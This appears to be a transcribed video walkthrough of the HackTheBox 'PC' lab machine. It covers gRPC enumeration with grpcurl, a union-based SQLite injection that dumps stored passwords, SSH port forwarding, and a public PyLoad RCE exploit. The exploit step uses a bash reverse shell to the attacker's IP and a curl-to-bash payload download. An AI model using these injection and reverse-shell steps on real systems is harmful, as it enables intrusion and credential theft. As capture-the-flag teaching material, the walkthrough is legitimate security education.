What's going on YouTube? This is Ipsec. We're doing PC from HackTheBox, which was a nice, easy machine, but used a technology not many people are familiar with, and that is gRPC, which is a remote procedural call server that was created by Google. RPC servers are very common. You see them on almost every Windows box, but many people don't really poke into them. They are much faster than HTTP because they don't really have much overhead and also typically use a serialization format to communicate data. In gRPC's case, that is protobuf. But all that information you don't need to know because there is a program called gRPCurl, which makes it behave very similar to just a typical HTTP server. And you can go poke at it, you enumerate the RPC, you discover an endpoint that has SQL injection, which allows you to dump data out of a SQLite database. And then the root step, it's just a web service that is running on localhost. The web service is PyLoad. If you look at exploitDB, you can pull down a POC, which just works out of the box. So with that being said, let's jump in. As always, we're going to start off with an nmap, so -sc for default scripts, SV, enumerate versions, OA, output all formats, put in the nmap directory and call it PC, and then the IP address, which is 10.10.11.214. This can take some time to run, so I've already ran it. Looking at the results, we have just one port open, and that is SSH on port 22, and its banner tells us it's an Ubuntu server. Now, there's not really much we can do with just SSH, so I'm going to throw another nmap at it. I'm going to do all ports. So we'll do nmap-p- a -v, so it shows us open ports as it finds it. That is verbose. And then I want to also say --min-rate is equal to 10,000. And that's going to send 10,000 packets per second. So now we put the IP address, and I wouldn't always recommend doing this min rate thing. It can miss ports when you do it this quickly, so definitely use it at your own caution. Also, on fragile network devices, it could take them offline and cause denial of services. So only use it when you really want something to go fast. Don't make it a default. And we have two ports open. We have 22 and 551. So, I guess I should say 50,051. So let's do sudo nmap-p 50051 -sc for default scripts, SV, enumerate versions. I'm not going to put this to an output file. I just want to see exactly what this looks like. So we'll just output it to the screen. We can also do a netcat, so 10.10.11.214 on port 50,051. We just get 3 question marks back. I'm going to pipe that over to XXD to get a hex dump of it. And we can see some hex here. We could try like Googling this to try to find out what this handshake is, but I don't think you get anything really. And Burp Suite, or not Burp Suite, nmap isn't really telling us anything either. I don't know why I said burp there. We just have a lot of verbose information that doesn't really make sense. So let us now go to Google. So I'm going to go search for port 50,051. And the first result over here, we see it is potentially gRPC, which is, I believe, Google RPC. Google RPC. We see it if you want to read more about it. It's a remote procedural call framework. It's kind of like HTTP, just has a lot less overhead and supports some things like bidirectional streaming and things like that. You'd normally see it like on backends. Like whenever you do a Windows box and you see, I think it's like port 139, that's going to be like the RPC interface. It's not HTTP. It's just a way to make requests. So I'm going to go to the package gRPC and then curl, which is on GitHub. And this is just a command line tool that has similar syntax to curl to interact with gRPC interfaces. And if I just try to build this, so we can try go install this at latest, and this should build the binary, but we see on the parent of this repository, it's not a main package. If I go to one of these files like grpcurl.go, its package is gRPCurl. There is a cmd/gRPCurl folder. And if I go in here and look at it, we see the packages main. So this is where the heart of the application is, or at least what we want to compile. So I'm going to add a /cmd and then gRPCurl again, and it will go out and build this. Now, we can't execute it right off the bat if we don't have our go install or a go path in our path. or the Go binary path. So if we go to cd/, my default is just home go, and then you have a bin here, and that's where gRPCurl got set. So if we try to execute it, we can't. We can echo a path and see everything in our path. Maybe it's better if we do a sed and replace colons with line breaks. Is that it? /r/n. Easier way to display the path. There's a lot of folders here, but Go is not one of them. So I'm going to export path is equal to the path, and then we'll do home ipsec go bin, because that's the directory where this got put, right? And now, if I run the same gRPCurl, we have too few arguments. So now we can run this. We can do a -- help and see like the syntax it wants. So we have flags, the address, then we can either list or describe, and then the symbol. So let's just try connecting to it. We'll do gRPCurl 10.10.11.214, and then the port 50,051. Too few arguments. I'm going to try list, and we get an error about TLS. First record doesn't look like a TLS handshake. So I'm going to search back for TLS and see if there's anything to use plain text, and we have a -plain text option. If this was exactly like curl, it would be -k, but I'm just going to put -plain text here, and we can see two, what did it call it? Let's see, two symbols, SimpleApp and this default gRPC reflection v1 alpha server reflection. I'm going to start with enumerating SimpleApp because this looks like it is created for this box. And I always like attacking the custom created things first because we're more likely to find a vulnerability, right? So if I list SimpleApp, we see three functions: login user, register user, and getinfo. Oddly enough, the getinfo has a lowercase g. If this was Golang, then that would mean it's not a global variable, I believe, or it's not exportable. It'd only be accessible within that same package. That probably doesn't make sense, so probably forget what I just said. Let's just go explore the login user. So I'm going to do SimpleApp.login user, and symbol not found. Let's try describe. See what describe does. We get nothing. Let's just try describing the SimpleApp. And we have three interfaces: login user, register user, and getinfo. And we see it takes a login user request. So I'm going to try to describe a login user request. And we see it wants a message, and we have username and password. We could also look at the response, and we just have message. So I'm going to now describe the register user request, and the same thing, username, password. If we do response, we have just the message. And then if we do getinfo, let's do describe SimpleApp. We want getinfo request. It just wants an ID. And if we do response, we can see it sends a message back. So I don't know why all three of these functions have a unique struct that they respond with, because it could have all just been with one. It could have been like .generic response, because all of them just have a struct with one thing, and that is message. So the fact that these are all unique, a little bit odd, but not that interesting. So let's see. We probably want to start off with register user. So register user accepted two parameters. It accepted a username and password. And we can just go back to register user request and see that. So let's do gRPCurl --help. I did it in a different window. I'm going to grab my export. I'm going to copy it. And let's just put it here. So gRPCurl help. There we go. So I want to send data. If I just search for data, we have a message template. We have -d and then string. So this is going to be the data of it. And then we also have format, which is the format request of data. It's either text or JSON. For JSON, the input data must be in JSON format. And for text, the input data must be in protobuf text format, in which case multiple request values must be separated by the record separator. And it defaults to JSON. So let's just try. We'll go back up here. So we want to hit SimpleApp.register user. It's going to complain username and password must be greater than 4. So I'm going to add -d, and then we'll do username semicolon ipsec. And if I didn't put it in quotes, it's going to error out because it wants it as strings. And one of the things about gRPC is it's very specific on the type. So if we pass it the wrong type or anything else, it errors. Invalid character U, looking at beginning. The reason why is it's set to JSON right now. So because the string began with a U, it errors out. We could do -format text to take that away. And there we go. So it was expecting a string value. And you think we passed it a string, but we need to put that in quotes. And I highlighted this because this is the same for integers. The server, if you pass it just like 1 later when we do a number, it's going to be completely different than that. I'll make sure it errors when we do that, so hopefully you understand it. So now we have the account created for ipsec. So let's try registering. So let's try logging in. So we can now just do login user. And we get our ID is 659. So it's a bit odd. It didn't really give us anything. It just says your ID is 659. I was expecting some type of way to persist my session because this is stateless right now. Like if I make another request, it's not going to know my IP address is ID 659, but let's just go with it. The next one we want to do is get info, and that one only wanted ID. So let's just do ID 659, and it expected a string value and got 659 because I forgot to put that in quotes. So we do this, and we have authorization missing, the token header. So it wanted a header called token. So we can also add headers with -h, just like in HTTP, and say token and put a value there. I could have swore that would be how we do it. Let's see. Search header, RPC header, -h, name, :value. Maybe I put ipsec in quotes. So I'm pretty sure I gave it the token header. It's probably just a invalid token and the error message is bad. So let us go back to a login. Simple auth, we're logging in. ipsec, please subscribe. ID is this. If I went back to the help, gRPCurl, there is a -v for verbose output. And this part took me a while to figure out on this box. If you do verbose, it's going to give you a little bit more information, maybe some debug information. That's where the token is. And this is just a typical JWT. So if I just echo this and then base64 decode it, we can see the values. We got user ID, expiration. So let's go back to the same request we did with the -h, and I'm going to paste this value. And it's still missing the token header. Let's see. If I take the quotes off, I don't think that's the correct thing to do here, but let's try it. None type. Object is not subscriptable. So it definitely wanted the quotes. and then it misses it. Let's see. I'm going to try moving the token before the D parameter. Maybe it being before a format is screwing something up and it's not sending. Format text. We can put it right here. Missing token header. So I'm doing something wrong. T-O-K-E-N, T-O-K-E-N. That looks good. Oh, you know what it probably is? When I did this, my ID changed. My ID is now 453. Let's try putting 453 here. And it's still missing the header. Get rid of the quotes. And we got a message. So that was it. We don't want quotes around the token, and the ID also has to match this. And the message just says, will update soon. I don't know what will update soon. It just says it will. So what I'm going to do is try putting a different number. We'll do 452. And we get unknown. So that's weird. If I do a single quote, I broke my input. Let's see. How's the best way to do this? If I put ID in double quotes, and then we escape these. Okay. And now we can insert a single quote. And we also get an error. So what I'm going to do is a single quote and then a comment. I'm testing for like SQL injection. We don't have anything. I'm going to try a double quote. Nothing. If I do no quotes, so 453 and then dash dash space dash, we have the message again. So this looks like a SQL injection because we can put anything after this and we still have message will update soon. So if the parameter is anything but 453, we get some error message, unless we put an SQL comment and then it just behaves the same. So I think the select statement is probably like, let's say, select authentication or, I don't know, session from sessions where ID is equal to 453. All I'm trying to say is they didn't put quotes around this because it's just a integer, so you don't need to. So that's why the dash in this broke, because it created a unbalanced number of single quotes. But we can fully verify that this is SQL injection by using a union. So I'm going to do union select 1. And we get message 1. So now we do know there is SQL injection here. So what we want to do is find out what type of database this is. So we can try like version. And this would just be like a MySQL version. Let's see. Right. We got bad type. We could try user, which I think is another thing. We can try SQLite underscore version, because that is the SQLite syntax for getting the version. And we have message 3.31.1. So we know this is SQLite. So we have to do some type of SQLite injection or dumping the tables, right? So I'm going to do select. Let's try SQL from, is it master in SQLite? Let's see. We may need group concat SQL from master. Maybe it's not master. What is it in SQLite? DB? No. Let's go over to Google and just do SQLite injection on Hacktricks. And let's see, what do we have? So I'm just going to search this page for SQLite. And my browser's going slow. This is how various SQL languages do comments. Let's see. This is identifying the backend. So remember when we were doing version, SQLite version? This is exactly how. I bet if we look, one of these languages has version. Maybe not. But these are all just functions that are specific to the language. So if it behaves this way, you know it's going to be this. So like MySQL, you could do any of these, like user underscore ID is equal to 1. That's a weird one. But yeah, these are just queries you can do to identify the framework. Or not framework, the MySQL database version. Says payload all the things. Come on, load. Let's do SQLite injections. SQLite version string base. Extract database. We got SQL scheme. Oh, SQLite master is what I wanted. So let's do up twice. I think it wasn't just master. It was SQLite underscore master. And we can see the message. So we have create table accounts. We got username and password. And create table messages. We have username and message. So let us dump all accounts. So let's do select. Did I need the group concat for this out of curiosity? I did, yeah. So we can do, again, a group concat. What this is doing is taking multiple rows and making it just one line. So we'll do username, and then in SQLite, if you want to append something, you do 2 pipes. And we'll do password here. From, where's the table name? Accounts. So this is the SQL command we are running. Select the username : password from accounts. Hit enter. And we have 2 users. We have admin and SAU. And here's your password 1431. We could also look at the messages. So if we wanted to, we could do group concat. Let's see. What are the 2 things in messages? Oh, we have 3. ID, username, and message. So let's just look at username, message, from messages. I think it was the admin is working hard to fix issues. That's the only message in this. So let us try SSH. So we can try SSH SAU at 10.10.11.215. And then we will try the password. Here is your password 1431. Was it 214, not 215? There we go. So now I am logged in to the box. So the first thing I always look at, especially when I have the password, is sudo. And we see SAU may not run sudo on localhost. The next thing I generally look at is just the running processes on the box to see if there's anything interesting. And 2 things stuck out right away. We have Python running as root for 2 different processes. We have opt app app.py and user local bin PyLoad. So if I look at ls opt app and this is probably going to be the gRPC interface, just because I see app.proto, which is going to be a proto buff thing. So if I cat it, cat app.proto, there's going to be all the structures, like the responses and everything. So first I'm going to look at like opt app, and then we'll do -writable, see if I can write to any of these things. We could also like grep-r system to see if there's any system calls. popen's another one in Python, I think, right? We're looking for ways to get code execution on this RPC interface. But there was another thing running as root, and that was PyLoad, right? So before I go dig into opt app app.py, I'm going to look at exactly what PyLoad is. So if I do sslntp to list ports that are listening, I see 1 localhost on port 8000. So if I curl this, localhost 8000, we see there is a web server up. So what I'm going to do is hit squiggly C when it's the first thing on a line. So it drops me into a SSH prompt. And then I'm going to say -L, and we can say 8000 localhost 8000. So what that's going to do is make my box listen on port 8000. We can see it's not listening now. I'm going to hit it. And now I am listening. And we can see SSH owns that process. So if I curl localhost, it's going to go through the SSH session and I have to specify port 8000 and show me what's listening on localhost 8000. So let's now open up our browser and we can say localhost 8000 and we have something that just says PyLoad. If I look at Control U, whenever I see an application, I try to find a version and I don't see one here. Let's see. Is there even an exploit for it? So exploit DB. Let's search. I could have ran searchsploit, but I don't know the last time I actually updated my box. So I don't know if that is up to date. We look at it and there is a pre-authentication RCE. So let's just copy this. Where is the copy button? I could have swore there used to be a copy button there. I'll just copy it. V pyload.py, paste it. And we can say Python 3, pyload. We want a URL, so we'll do localhost 8000-c command. Let's do who am I? No connections. Do you have to specify HTTP? Okay, there we go. So it is a blind command injection. We don't have any output when we run this. So let's just do nclvnp 9001. And the command we will run is bash-c bash-i dev tcp 10.10.14.8 9001 0 and 1 like that. And let's see. It did not send us a shell. Bash-i. I'm just going to test this command to make sure I typed it right. I'm missing a single quote. Okay, the command is typed right. I'm guessing it didn't like some of the special characters we did here. So let us, or I can do bin bash. Maybe this is in a virtual environment and it doesn't have a full path. Nope. So it's probably going to be special characters. So let's curl 10.10.14.8 9001. Make sure we can. Okay, curl does work. So let's just execute bash. Make dir dub, go init, v index.html, bin bash-c bash-i dev tcp 10.10.14.8 9001 0 and 1 like that. So now if I stand up my HTTP server on port 8001 and we curl localhost 8001, it's going to send this string. And that's called a web cradle, right? So now I'm going to instruct the command injection to curl 8001. It's going to get that string and we're just going to pipe it over to bash. So I have a lot less special characters because we don't have all these redirectors working. And there we go. We got our shell. If that didn't work, then we'd use like -o to write it to an out file and then execute it because it would be likely the pipe character didn't work, right? But now we are root. If we go to /root, we have root.txt. So that is going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next time.